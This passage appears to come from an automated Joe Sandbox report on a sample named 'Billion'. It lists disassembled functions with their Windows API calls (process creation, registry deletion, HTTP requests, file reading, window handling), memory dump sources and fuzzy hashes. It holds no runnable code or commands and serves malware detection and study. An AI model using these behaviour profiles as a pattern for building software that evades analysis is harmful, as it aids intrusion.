                                                                                                                                                                                                                                                                                                            • Part of subcall function 001A0F4E: GetStdHandle.KERNEL32(000000F6), ref: 001A0F6D
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001BBDAB
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001BBDC6
                                                                                                                                                                                                                                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 001BBE16
                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000000), ref: 001BBE67
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 001BBE99
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 001BBEAA
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 001BBEBC
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 001BBECE
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 001BBF43
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2178637699-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 7d3e713fd3f01d4cdd0abf2c92fd1be3f6da8a3e055a3806612bf96cbd6dd1e0
                                                                                                                                                                                                                                                                                                          • Instruction ID: ce8127f0ddd17fcf9d63125fd1667a42712a64f209cf233042e1b618ac01aeaa
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7d3e713fd3f01d4cdd0abf2c92fd1be3f6da8a3e055a3806612bf96cbd6dd1e0
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 68F1BF71608340DFCB15EF24C891BAABBE1BF95314F14855DF8998B2A2CB70EC45CB52
                                                                                                                                                                                                                                                                                                          Function 001B4A46 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 478libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,001CDCD0), ref: 001B4B18
                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 001B4B2A
                                                                                                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,001CDCD0), ref: 001B4B4F
                                                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,001CDCD0), ref: 001B4B9B
                                                                                                                                                                                                                                                                                                          • StringFromGUID2.OLE32(?,?,00000028,?,001CDCD0), ref: 001B4C05
                                                                                                                                                                                                                                                                                                          • SysFreeString.OLEAUT32(00000009), ref: 001B4CBF
                                                                                                                                                                                                                                                                                                          • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 001B4D25
                                                                                                                                                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 001B4D4F
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                                                                                                                                                                                                                                                                          • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                                                                                                                                                                                                          • API String ID: 354098117-199464113
                                                                                                                                                                                                                                                                                                          • Opcode ID: a11727c9d1b473b64aeefb4bd047540a1d9f0cd4d8004b29cdffdc3b2c08eb6b
                                                                                                                                                                                                                                                                                                          • Instruction ID: f63a21318a7040ad8787fa097b7ebd99addf9be40b5b2f7f22801affbf7fbf4d
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a11727c9d1b473b64aeefb4bd047540a1d9f0cd4d8004b29cdffdc3b2c08eb6b
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8512FA75A00115EFDB14DF98C884EAABBB5FF49314F25C098F909AB252D731ED46CBA0
                                                                                                                                                                                                                                                                                                          Function 0013381F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetMenuItemCount.USER32(002029C0), ref: 00173F72
                                                                                                                                                                                                                                                                                                          • GetMenuItemCount.USER32(002029C0), ref: 00174022
                                                                                                                                                                                                                                                                                                          • GetCursorPos.USER32(?), ref: 00174066
                                                                                                                                                                                                                                                                                                          • SetForegroundWindow.USER32(00000000), ref: 0017406F
                                                                                                                                                                                                                                                                                                          • TrackPopupMenuEx.USER32(002029C0,00000000,?,00000000,00000000,00000000), ref: 00174082
                                                                                                                                                                                                                                                                                                          • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0017408E
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                                                                                                                                                                                                                                          • String ID: 0
                                                                                                                                                                                                                                                                                                          • API String ID: 36266755-4108050209
                                                                                                                                                                                                                                                                                                          • Opcode ID: 91bfbd36651c195fdd2b19c1c8a37897978f8fa155077f60d9c5d40639d33a34
                                                                                                                                                                                                                                                                                                          • Instruction ID: 29a33b0b74052d9b3ba70afd8ea299b235d02489a8075b7623fe95dc81f4135c
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 91bfbd36651c195fdd2b19c1c8a37897978f8fa155077f60d9c5d40639d33a34
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 22710530645205BFEB258F28DC49FAABF75FF05364F108216F628A61E0C7B1A950EB95
                                                                                                                                                                                                                                                                                                          Function 001C7711 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • DestroyWindow.USER32(00000000,?), ref: 001C7823
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00138577: _wcslen.LIBCMT ref: 0013858A
                                                                                                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 001C7897
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 001C78B9
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 001C78CC
                                                                                                                                                                                                                                                                                                          • DestroyWindow.USER32(?), ref: 001C78ED
                                                                                                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00130000,00000000), ref: 001C791C
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 001C7935
                                                                                                                                                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 001C794E
                                                                                                                                                                                                                                                                                                          • GetWindowRect.USER32(00000000), ref: 001C7955
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 001C796D
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 001C7985
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00132234: GetWindowLongW.USER32(?,000000EB), ref: 00132242
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                                                                                                                                                                                                                                          • String ID: 0$tooltips_class32
                                                                                                                                                                                                                                                                                                          • API String ID: 2429346358-3619404913
                                                                                                                                                                                                                                                                                                          • Opcode ID: c8b6e5d4ac8c51f3ea25cb9bb91303239a03cdc013d8faf7e24cdc856c556eff
                                                                                                                                                                                                                                                                                                          • Instruction ID: af5f93c12ff00644a43ac1aeae728cbbfbe216b8a2b04144727dbf01fe62f84a
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c8b6e5d4ac8c51f3ea25cb9bb91303239a03cdc013d8faf7e24cdc856c556eff
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 06716670108345AFD725DF18DC48F6ABBE9EB99318F14446EF985872A1CBB0E946CF12
                                                                                                                                                                                                                                                                                                          Function 0013146D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 168timeCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00131802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00131488,?,00000000,?,?,?,?,0013145A,00000000,?), ref: 00131865
                                                                                                                                                                                                                                                                                                          • DestroyWindow.USER32(?), ref: 00131521
                                                                                                                                                                                                                                                                                                          • KillTimer.USER32(00000000,?,?,?,?,0013145A,00000000,?), ref: 001315BB
                                                                                                                                                                                                                                                                                                          • DestroyAcceleratorTable.USER32(00000000), ref: 001729B4
                                                                                                                                                                                                                                                                                                          • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,0013145A,00000000,?), ref: 001729E2
                                                                                                                                                                                                                                                                                                          • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,0013145A,00000000,?), ref: 001729F9
                                                                                                                                                                                                                                                                                                          • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0013145A,00000000), ref: 00172A15
                                                                                                                                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00172A27
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                                                                                                                                                                                          • String ID: <)
                                                                                                                                                                                                                                                                                                          • API String ID: 641708696-2904062661
                                                                                                                                                                                                                                                                                                          • Opcode ID: 1c1253402a706f67b40c10aebdc95a257f1596e0dd69723ad0dc6ac2d280fb51
                                                                                                                                                                                                                                                                                                          • Instruction ID: 628849d2ee5d586e36e04b3ecc30b69586bee51ceed2c99803fdc2c7cf1aabb3
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c1253402a706f67b40c10aebdc95a257f1596e0dd69723ad0dc6ac2d280fb51
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A617931501715EFDB399F18E94DB2ABBB1FB85326F20812AE04797A61C770E895CB84
                                                                                                                                                                                                                                                                                                          Function 001ACEBB Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 001ACEF5
                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 001ACF08
                                                                                                                                                                                                                                                                                                          • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 001ACF1C
                                                                                                                                                                                                                                                                                                          • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 001ACF35
                                                                                                                                                                                                                                                                                                          • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 001ACF78
                                                                                                                                                                                                                                                                                                          • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 001ACF8E
                                                                                                                                                                                                                                                                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001ACF99
                                                                                                                                                                                                                                                                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 001ACFC9
                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 001AD021
                                                                                                                                                                                                                                                                                                          • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 001AD035
                                                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 001AD040
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3800310941-3916222277
                                                                                                                                                                                                                                                                                                          • Opcode ID: c28746ac1f75e933072b06731e202423cfa47ceb31eb25eb92e1ccb396f925ee
                                                                                                                                                                                                                                                                                                          • Instruction ID: 9a5c14fd1b28be8547a14a5dc869563ff61ba9ba0d57382fa57552e2c8b8d776
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c28746ac1f75e933072b06731e202423cfa47ceb31eb25eb92e1ccb396f925ee
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8D517FB5500B04BFDB219FA0ED88EAB7BBCFF1A744F004429F94696650D734D9459BA0
                                                                                                                                                                                                                                                                                                          Function 001C8FCB Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,001C66D6,?,?), ref: 001C8FEE
                                                                                                                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,001C66D6,?,?,00000000,?), ref: 001C8FFE
                                                                                                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,001C66D6,?,?,00000000,?), ref: 001C9009
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,001C66D6,?,?,00000000,?), ref: 001C9016
                                                                                                                                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 001C9024
                                                                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,001C66D6,?,?,00000000,?), ref: 001C9033
                                                                                                                                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 001C903C
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,001C66D6,?,?,00000000,?), ref: 001C9043
                                                                                                                                                                                                                                                                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,001C66D6,?,?,00000000,?), ref: 001C9054
                                                                                                                                                                                                                                                                                                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,001D0C04,?), ref: 001C906D
                                                                                                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 001C907D
                                                                                                                                                                                                                                                                                                          • GetObjectW.GDI32(00000000,00000018,?), ref: 001C909D
                                                                                                                                                                                                                                                                                                          • CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 001C90CD
                                                                                                                                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 001C90F5
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 001C910B
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3840717409-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 0595bff7d5740fac079aa37d5498cffbb1b7ab03108d6387f40c39b16ce8f61f
                                                                                                                                                                                                                                                                                                          • Instruction ID: f655811026a2dbdde57eaa046f76678c2095d98c3b16792739b36a703c12b384
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0595bff7d5740fac079aa37d5498cffbb1b7ab03108d6387f40c39b16ce8f61f
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8141F775600208AFDB119FA5EC8CEAABBBDFF89711F144069F905E7660D770D981DB20
                                                                                                                                                                                                                                                                                                          Function 001BC06E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013B329: _wcslen.LIBCMT ref: 0013B333
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001BD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,001BC10E,?,?), ref: 001BD415
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001BD3F8: _wcslen.LIBCMT ref: 001BD451
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001BD3F8: _wcslen.LIBCMT ref: 001BD4C8
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001BD3F8: _wcslen.LIBCMT ref: 001BD4FE
                                                                                                                                                                                                                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001BC154
                                                                                                                                                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 001BC1D2
                                                                                                                                                                                                                                                                                                          • RegDeleteValueW.ADVAPI32(?,?), ref: 001BC26A
                                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 001BC2DE
                                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 001BC2FC
                                                                                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(advapi32.dll), ref: 001BC352
                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 001BC364
                                                                                                                                                                                                                                                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 001BC382
                                                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 001BC3E3
                                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 001BC3F4
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                                                                                                                                                                                                                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                                                                                                                                          • API String ID: 146587525-4033151799
                                                                                                                                                                                                                                                                                                          • Opcode ID: f1acc0431f40e63f796f1e909706c12f19f82b19eab639713b28b792f6861036
                                                                                                                                                                                                                                                                                                          • Instruction ID: 0cad6fdc8e9552fa4b20af4404bdc44df4743580adcde116490151aa1e6ef671
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f1acc0431f40e63f796f1e909706c12f19f82b19eab639713b28b792f6861036
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 49C19D74208201AFD714DF68C495F6ABBE1BF94308F54849CF4968B2A2CB71ED46CBD1
                                                                                                                                                                                                                                                                                                          Function 001CA94F Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 271windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013249F: GetWindowLongW.USER32(00000000,000000EB), ref: 001324B0
                                                                                                                                                                                                                                                                                                          • GetSystemMetrics.USER32(0000000F), ref: 001CA990
                                                                                                                                                                                                                                                                                                          • GetSystemMetrics.USER32(00000011), ref: 001CA9A7
                                                                                                                                                                                                                                                                                                          • GetSystemMetrics.USER32(00000004), ref: 001CA9B3
                                                                                                                                                                                                                                                                                                          • GetSystemMetrics.USER32(0000000F), ref: 001CA9C9
                                                                                                                                                                                                                                                                                                          • MoveWindow.USER32(00000003,?,?,00000001,?,00000000,?,00000000,?,00000000), ref: 001CAC15
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 001CAC33
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 001CAC54
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(00000003,00000000), ref: 001CAC73
                                                                                                                                                                                                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 001CAC95
                                                                                                                                                                                                                                                                                                          • DefDlgProcW.USER32(?,00000005,?), ref: 001CACBB
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
